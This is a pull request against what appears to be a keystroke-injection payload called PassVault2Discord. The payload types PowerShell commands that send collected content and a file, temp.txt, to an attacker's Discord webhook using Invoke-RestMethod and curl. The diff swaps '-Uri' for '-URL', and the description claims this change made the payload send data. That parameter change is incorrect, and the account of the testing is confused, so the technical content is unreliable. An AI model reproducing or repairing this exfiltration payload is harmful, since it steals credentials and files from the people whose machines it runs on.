### PR TITLE
URI or URL

### DIFF
--- a/PassVault/PassVault2Discord.txt
+++ b/PassVault/PassVault2Discord.txt
@@ -19,7 +19,7 @@ DELAY 1500
 STRING $payload=[PSCustomObject]@{ content=$content }
 ENTER
 DELAY 1500
-STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $webhook -Method Post -Body ($payload | ConvertTo-Json)
+STRING Invoke-RestMethod -ContentType 'Application/Json' -URL $webhook -Method Post -Body ($payload | ConvertTo-Json)
 ENTER
 DELAY 1500
 STRING curl.exe -F "file1=@temp.txt" $webhook


### PR DESCRIPTION
I've tried a couple of the payloads which requires for the most part a webhook from discord but I see that with my first attempts nothing was sent to the server #general(yes I changed the webhook) and decided to look over the code and saw it said Uri instead of URL (before noticing I tried using the name instead of the URL to see if that would work. It did not.) My point is the payload didn't send anything to the server until I changed it. I still didn't get anything but to get it to send the text file to the server (nothing in the file although I did run into errors on the powershell running the script.)